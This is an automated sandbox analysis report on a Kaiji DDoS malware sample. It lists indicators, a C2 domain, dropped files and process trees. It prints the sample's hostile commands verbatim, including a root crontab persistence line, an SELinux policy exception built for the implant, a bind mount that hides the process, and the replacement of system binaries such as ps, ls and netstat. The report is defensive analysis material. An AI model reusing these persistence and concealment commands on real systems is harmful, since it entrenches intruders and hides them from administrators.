Linux Analysis Report
linux_arm6.elf

Overview

General Information

Sample name: linux_arm6.elf
Analysis ID: 1572673
MD5: c5f2dde5dca123520549bd745325fa64
SHA1: 2b154bf7d864b50f746348bc93044e8e939dbee1
SHA256: b3f7cb72809a18ea6a45ac6658fac539e2c066184485e041845d2e2f9949125f
Tags: elf, user-abuse_ch

Detection

Kaiji
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Kaiji
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Writes identical ELF files to multiple locations
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Drops files with innocent-looking names
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads the 'hosts' file potentially containing internal network hosts
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572673
Start date and time: 2024-12-10 19:02:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: linux_arm6.elf
Detection: MAL
Classification: mal76.spre.troj.evad.linELF@0/77@4/0
  • VT rate limit hit for: linux_arm6.elf
Command: /tmp/linux_arm6.elf
PID: 5483
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:

Standard Error:

  • system is lnxubuntu20
  • linux_arm6.elf (PID: 5483, Parent: 5409, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/linux_arm6.elf
    • linux_arm6.elf (PID: 5488, Parent: 5483, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/linux_arm6.elf
      • bash (PID: 5501, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32675&
        • bash New Fork (PID: 5506, Parent: 5501)
        • 32675 (PID: 5506, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32675
          • 32675 New Fork (PID: 5509, Parent: 5506)
          • sleep (PID: 5509, Parent: 5506, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • 32675 New Fork (PID: 5723, Parent: 5506)
          • opt.services.cfg (PID: 5723, Parent: 5506, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /etc/opt.services.cfg
            • opt.services.cfg (PID: 5728, Parent: 5723, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /etc/opt.services.cfg
          • 32675 New Fork (PID: 5731, Parent: 5506)
          • sleep (PID: 5731, Parent: 5506, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
      • service (PID: 5507, Parent: 5488, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
        • service New Fork (PID: 5510, Parent: 5507)
        • basename (PID: 5510, Parent: 5507, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5511, Parent: 5507)
        • basename (PID: 5511, Parent: 5507, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5512, Parent: 5507)
        • systemctl (PID: 5512, Parent: 5507, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5513, Parent: 5507)
          • service New Fork (PID: 5514, Parent: 5513)
          • systemctl (PID: 5514, Parent: 5513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5515, Parent: 5513)
          • sed (PID: 5515, Parent: 5513, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5507, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
      • bash (PID: 5522, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5528, Parent: 5522)
        • systemctl (PID: 5528, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5532, Parent: 5522)
        • systemctl (PID: 5532, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service
        • bash New Fork (PID: 5538, Parent: 5522)
        • systemctl (PID: 5538, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service
        • bash New Fork (PID: 5560, Parent: 5522)
        • journalctl (PID: 5560, Parent: 5522, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 5575, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
        • bash New Fork (PID: 5580, Parent: 5575)
        • bash New Fork (PID: 5581, Parent: 5575)
        • bash New Fork (PID: 5582, Parent: 5575)
      • bash (PID: 5583, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
      • renice (PID: 5613, Parent: 5488, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 5488
      • mount (PID: 5619, Parent: 5488, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5488
      • service (PID: 5645, Parent: 5488, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 5650, Parent: 5645)
        • basename (PID: 5650, Parent: 5645, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5651, Parent: 5645)
        • basename (PID: 5651, Parent: 5645, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5652, Parent: 5645)
        • systemctl (PID: 5652, Parent: 5645, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5653, Parent: 5645)
          • service New Fork (PID: 5654, Parent: 5653)
          • systemctl (PID: 5654, Parent: 5653, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5655, Parent: 5653)
          • sed (PID: 5655, Parent: 5653, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5645, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 5671, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 5530, Parent: 5529)
  • snapd-env-generator (PID: 5530, Parent: 5529, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5536, Parent: 5535)
  • snapd-env-generator (PID: 5536, Parent: 5535, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5539, Parent: 1)
  • System.mod (PID: 5539, Parent: 1, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
    • System.mod (PID: 5555, Parent: 5539, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
  • systemd New Fork (PID: 5566, Parent: 1)
  • System.mod (PID: 5566, Parent: 1, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
    • System.mod (PID: 5571, Parent: 5566, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
  • udisksd New Fork (PID: 5632, Parent: 803)
  • dumpe2fs (PID: 5632, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5670, Parent: 1)
  • cron (PID: 5670, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5688, Parent: 5670)
      • cron New Fork (PID: 5694, Parent: 5688)
      • sh (PID: 5694, Parent: 5688, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5695, Parent: 5694)
        • .mod (PID: 5695, Parent: 5694, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5696, Parent: 5695)
          • libgdi.so.0.8.1 (PID: 5696, Parent: 5695, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
            • libgdi.so.0.8.1 (PID: 5701, Parent: 5696, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
  • systemd New Fork (PID: 5716, Parent: 1)
  • cron (PID: 5716, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5758, Parent: 5716)
      • cron New Fork (PID: 5759, Parent: 5758)
      • sh (PID: 5759, Parent: 5758, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5760, Parent: 5759)
        • .mod (PID: 5760, Parent: 5759, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5761, Parent: 5760)
          • libgdi.so.0.8.1 (PID: 5761, Parent: 5760, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
            • libgdi.so.0.8.1 (PID: 5766, Parent: 5761, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
  • systemd New Fork (PID: 5780, Parent: 1)
  • cron (PID: 5780, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
Name: Kaiji
Description: Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji
Source | Rule | Description | Author | Strings
linux_arm6.elf | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |

Source | Rule | Description | Author | Strings
/boot/System.mod | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |
/etc/opt.services.cfg | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |
/usr/bin/include/ss | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |
/usr/bin/include/ls | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |
/usr/bin/include/ps | JoeSecurity_Kaiji_1 | Yara detected Kaiji | Joe Security |

No Suricata rule has matched

AV Detection

Source: linux_arm6.elf | ReversingLabs: Detection: 34%
Source: global traffic | TCP traffic: 192.168.2.14:36016 -> 93.123.85.138:60888
Source: /tmp/linux_arm6.elf (PID: 5488) | Reads hosts file: /etc/hosts
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: cc.ava9527.cc
Source: netstat.14.dr | ELF static info symbol of dropped file: freeaddrinfo
Source: netstat.14.dr | ELF static info symbol of dropped file: getaddrinfo
Source: netstat.14.dr | ELF static info symbol of dropped file: getnameinfo
Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | String found in binary or memory: http://.css
Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | String found in binary or memory: http://.jpg
Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | String found in binary or memory: http://html4/loose.dtd
Source: lsof.14.dr | String found in binary or memory: https://github.com/lsof-org/lsof
Source: lsof.14.dr | String found in binary or memory: https://github.com/lsof-org/lsof/blob/master/00FAQ
Source: lsof.14.dr | String found in binary or memory: https://github.com/lsof-org/lsof/blob/master/Lsof.8
Source: lsof.14.dr | String found in binary or memory: https://github.com/lsof-org/lsofhttps://github.com/lsof-org/lsof/blob/master/00FAQhttps://github.com
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://gnu.org/licenses/gpl.html
Source: dir.14.dr | String found in binary or memory: https://translationproject.org/team/
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions.oga
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions.ogv
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://www.gnu.org/gethelp/
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://www.gnu.org/software/coreutils/
Source: ls.14.dr, dir.14.dr | String found in binary or memory: https://www.gnu.org/software/coreutils/Report
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /etc/opt.services.cfg
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /boot/System.mod
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /etc/profile.d/bash_cfg
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/lib/libgdi.so.0.8.1
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/lib/system-mark
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/ps
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/ss
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/ls
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/dir
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/netstat
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/find
Source: /tmp/linux_arm6.elf (PID: 5488) | HTML file containing JavaScript created: /usr/bin/lsof
Source: ss.14.dr | ELF static info symbol of dropped file: mnl_nlmsg_get_payload
Source: ss.14.dr | ELF static info symbol of dropped file: mnl_nlmsg_get_payload_len
Source: ELF static info symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal76.spre.troj.evad.linELF@0/77@4/0
Source: ELF file section | Submission: linux_arm6.elf
Source: ELF file section | Dropped file: opt.services.cfg.14.dr
Source: ELF file section | Dropped file: System.mod.14.dr
Source: ELF file section | Dropped file: bash_cfg.14.dr
Source: ELF file section | Dropped file: libgdi.so.0.8.1.14.dr
Source: ELF file section | Dropped file: system-mark.14.dr
Source: ELF file section | Dropped file: ps0.14.dr
Source: ELF file section | Dropped file: ss0.14.dr
Source: ELF file section | Dropped file: ls0.14.dr
Source: ELF file section | Dropped file: dir0.14.dr
Source: ELF file section | Dropped file: netstat0.14.dr
Source: ELF file section | Dropped file: find0.14.dr
Source: ELF file section | Dropped file: lsof0.14.dr

Persistence and Installation Behavior

Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/profile.d/bash_cfg
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/profile.d/bash_cfg.sh
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/profile.d/gateway.sh
Source: /bin/bash (PID: 5583) | File: /etc/crontab
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/32675 (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/lib/system-mark
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /etc/opt.services.cfg
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/netstat
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/lsof
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/ls
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/find
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/ss
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /etc/profile.d/bash_cfg
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/dir
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/lib/libgdi.so.0.8.1
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/ps
Source: /tmp/linux_arm6.elf (PID: 5488) | File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /boot/System.mod
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/.ares
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /dev/.walk.lod
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/.walk
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /etc/.walk
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /dev/.old
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /dev/.img
Source: /tmp/linux_arm6.elf (PID: 5488) | File: /.mod
Source: /etc/opt.services.cfg (PID: 5728) | File: /etc/.ares
Source: /etc/opt.services.cfg (PID: 5728) | File: /etc/.walk
Source: /etc/opt.services.cfg (PID: 5728) | File: /dev/.walk.lod
Source: /boot/System.mod (PID: 5555) | File: /etc/.ares
Source: /boot/System.mod (PID: 5555) | File: /dev/.walk.lod
Source: /boot/System.mod (PID: 5555) | File: /etc/.walk
Source: /.mod (PID: 5695) | Directory: /.mod
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701) | File: /dev/.walk.lod
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701) | File: /etc/.ares
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701) | File: /etc/.walk
Source: /.mod (PID: 5760) | Directory: /.mod
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) | File: /etc/.ares
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) | File: /etc/.walk
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) | File: /dev/.walk.lod
Source: /tmp/linux_arm6.elf (PID: 5488) | Empty hidden file: /dev/.old
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) | Empty hidden file: /etc/.ares
Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) | Empty hidden file: /dev/.walk.lod
Source: /tmp/linux_arm6.elf (PID: 5488) | Empty hidden file: /dev/.img
              Source: /tmp/linux_arm6.elf (PID: 5501)Shell command executed: /bin/bash -c /etc/32675&Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5522)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5575)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5583)Shell command executed: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"Jump to behavior
              Source: /usr/sbin/cron (PID: 5694)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
              Source: /usr/sbin/cron (PID: 5759)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
              Source: /usr/sbin/service (PID: 5507)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5512)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5514)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /bin/bash (PID: 5528)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
              Source: /bin/bash (PID: 5532)Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.serviceJump to behavior
              Source: /bin/bash (PID: 5538)Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5645)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5652)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 5654)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5671)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/32675 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /etc/opt.services.cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /boot/System.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /etc/profile.d/bash_cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/lib/libgdi.so.0.8.1Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/lib/system-markJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/include/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File written: /usr/bin/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/32675Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/acpidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utilsJump to dropped file
